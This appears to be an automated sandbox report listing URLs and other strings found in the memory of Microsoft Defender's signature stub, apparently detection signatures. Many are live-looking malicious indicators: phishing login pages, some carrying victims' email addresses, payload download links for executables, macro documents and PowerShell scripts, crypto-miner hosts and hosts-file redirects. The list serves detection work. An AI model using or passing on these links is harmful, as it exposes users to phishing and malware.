Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://vm.jt-voicem.club/?e=ljeffcoat
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://vmnames.ssvoipsx.xyz/?e=%25
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://vn.pr-nijim.xyz/?e=soumu
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://voice.vm-business.online/?e=jscott
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://voicemailss.hozoimn.xyz/?e=twfyawx5bi5kywvja2vslw1peebnyxjhdghvbkvszwn0cmljlmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: https://voipses.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: https://voipss.snonames.xyz/?e=%25
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: https://vooydvclhlqukhdvrsxe.com/tx.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://voyya.com.mx/wp-content/themes/Divi/incl(
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://vp.videomeet.club/?e=
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://vr2oq.csb.app/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/4a8gk
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/ghqec
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/xndcx
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp	String found in binary or memory: https://vtsamples.commondatastorage.googleapis.com/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gcbs
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gccs
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://wacochamber.com/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://wayphositu.info/nasm3m/chalo.php?id=154789
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://we.tl/t-ccUfUrQOhF
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://webmailx.space/ml/ama/4/excel/log.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://wordpress.greekstrading.com/wp-content/plugins/megamenu/integ%oS)IaGrati%oS)IaGon/twentyseve
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://world-wwt.com/wp-admin/css/colors/coffee/reportexcelnew.php
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://www-cdn.getwebcake.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: https://www.%s.com.br/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/download/pJhaizQgba/wd11.exe
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%xc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/web/directdownload/plcok719ce/hhnjnm.d9cc6b8210cf7f938818851
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.admos-gleitlager.de/feed/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.advokathuset.dk/auktioner/tvangsauktioner/saadan-koeber-du-paa-tvangsauktion
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: https://www.aec.com.my/aec_5.5/public/ph/h/page.php
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: https://www.africafooddistribution.com/wp-content/themes/topxoh/sloch/index.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.anca-aste.it/uploads/form/boeing_spe_leos_logo.jpg
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/address/)1(0&
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/appleca/0
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://www.arm-mn.com/wp-content/themes/bb-theme/classes/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://www.astedams.it/uploads/frame/61.dotm
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://www.astedams.it/uploads/template/17.dotm
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.augenta.com/site/xmlrpc.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.autopfand24.de/pfandhaus-in-meiner-naehe/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://www.bancanetempresarial.banamex
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: https://www.bitly.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://www.bitly.com/bug41
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: https://www.bizsonet.com/wp-admin/js/jquery
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.botanicinnovations.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.brawnmediany.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.cactusthebrand.com/xmlrpc.php
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: https://www.ccleaner.com/inapp/installerofferpage
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.coastalbridgeadvisors.com
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: https://www.cogmobile.com/next1.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.creamery201.com/
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp	String found in binary or memory: https://www.dfib.net/calc.exe
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://www.divera.nl/wp-content/themes/flexfit/framework/css/font/gr
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: https://www.doganturan.av.tr/wp-admin/alu/reportdhlnew2.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://www.doganturan.av.tr/wp-admin/bigi/reportdhlnew2.php
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/dmprbq9mxwylpht/zs437zfig68f.doc?dl=1
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/jxfyg8a6oj13z7i/factuur%20006643-89845.zip
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/r9xrl3meju6lr19/payment_advice.uue?dl=1)
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/accountinfo.asp
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/ai.asp?c=AS
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/verify.asp
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/verify.asp&BAction=
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/aa/excel.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/bb/excel.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/cc/excel.php
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: https://www.elcom.admin.ch
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://www.emergencydentistlondonpro.co.uk/hddu2vgb7muait.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.escrowprotects.com/share
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.exploit-db.com/exploits/39719/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://www.fabianiarte.com/uploads/imgup/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp	String found in binary or memory: https://www.fastsupport.com
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: https://www.fastsupport.com/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: https://www.finance-portal.basf.net/portal
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://www.flexdirect.adp.com/client/login.aspx
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: https://www.formtools.com/f/micr0soft0ffice365mail
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.fotoideaymedia.es/wp-content/themes/fotoideaymedia2017/css/reset.css
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://www.freecontent.bid./cpcu.js
Source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/j/collect.
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com.tr/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://www.gottalife.net/wp-content/plugins/seo_index/evt8tkbsidbqf.php
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://www.gqtoronto.com/live/excelzz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://www.hashing.win/scripts/min.js
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: https://www.hashing.win/t5s0.js
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://www.horizon-sun.com/po/mailbox/rectify/sys-admin-9-0-4-7/repair-00-4/1159.php
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://www.icq.com/people/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: https://www.ijsiodjfo.ml/index.php?user=
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://www.ijtra.com/pear/docs/structures_graph/docs/html/media/tito/po.htm
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://www.kbtseafood.com/wp-content/uploads/2019/07/JTGUJRDPX.res
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://www.listrikindo.com/templates/vinye/wp-content/themes/jamo/order1.doc
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: https://www.llotytue.gq/index.php?user=
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://www.luongynhiem.com/wp-content/themes/sahifa/js/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: https://www.maan2u.com/alls.txt
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.managuytakayama.com/purchases
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: https://www.marriott.com
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://www.miracleworkstudios.com/wp-content/uploads/2019/12/app/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://www.monconcept-renovation.fr/wp-admin/network/msci.exe
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://www.moverandpackermvp.com/hindustan/scan/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.nachhilfe-unterricht.com/wp-content/cache/autoptimize/css/autoptimize_018281502668e27604
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: https://www.nathiagali.com/wp-includes/phpmailer/fmupdates/next.php
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: https://www.nathiagali.com/wp-includes/pomo/s2/danielmccarthy.php
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: https://www.ne-ba.org/files/gallery/images/bae_ecs_epm.jpg
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://www.nextrecruitment.ro//pdd/sfexpress/index.php?email=hiroyuki.ume.zh
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: https://www.notion.so/ce3baa2cd5ec4f4eab00575f5ae423e8
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://www.objectiveline.com/tt-onedrive/sugar.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: https://www.palmtipsheet.com/wp-content/calc1.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://www.pamelamann.co.za/1/shola/doc/purchase.doc
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: https://www.paypal.com
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: https://www.piriform.com/inapp/installerofferpage
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.pmc-services.de
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://www.protectalaskasfuture.com/wp-content/upgrade/new.php
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: https://www.realvnc.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://www.sanlorenzoyacht.com/newsl/uploads/docs/43.dotm
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: https://www.slgroupsrl.com/vendo
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: https://www.spectrumhosting.co.za/hello-3.wav
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://www.sugarsync.com/pf
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://www.tamim.pro/wp-content/themes/beonepage-pro/languages/msg.j
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp	String found in binary or memory: https://www.teamviewer.com
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://www.tecel.cl/.well-known/frank/next.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://www.tecel.cl/content/ak/next.php
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: https://www.thegoodplan.ovh/promo.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://www.torproject.org/download/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: https://www.tsuburaya-prod.co.jp/wp-content/plugins/wp-ogp/sa.exe
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://www.ultimateislandguide.com//cache/.p/next.php
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://www.upload.ee/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://www.upload.ee/download/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://www.vacsax.co.uk/wp-admin/mile/graceserver.php
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.vespang.cf/ideshow/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://www.vespang.cf/ideshow/post.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://www.yaplakal.com/go/?https://yothuful-lichretman-bboae1.netlify.app#juangondo
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://www.zimsgizmos.biz/wp-content/themes/zgf/images/headers/hp.gf
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp	String found in binary or memory: https://www2.bancobrasil.com.br/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://xf.zp-inwsice.online/?e=claire
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://xmr-services.tk/
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://xtronbikewear.co.uk/gt/dhl_topscript/source/index.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://xw.kh-imoice.online/?e=info
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: https://y/ews/Exchange.asmx
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://yerl.org/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: https://ygmservices.com/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://yoga.webnatico.com/wp-admin/maint/msci.exe
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://youc1000.com/f.html#/ywxsaxnvbi5ly2tszxlay3nnas5jb20=
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://zk.fx-invoice.online/?e=info

Source: unknown

DNS traffic detected: queries for: spclient.wg.spotify.com

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/www.google.com/] equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: "http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: .src='http://www.facebook.com/plugins/like.php?href='+encodeuricomponent( equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: :127.0.0.1 www.login.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: <127.0.0.1 www.search.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0x equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0xx equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: G"http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	String found in binary or memory: Hping -t -w 1 -l 65500 www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: YouTube http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: dc:\arquivos de programas\internet explorer\iexplore.exe http://www.youtube.com/watch?v=Vjp7vgj119s equals www.youtube.com (Youtube)
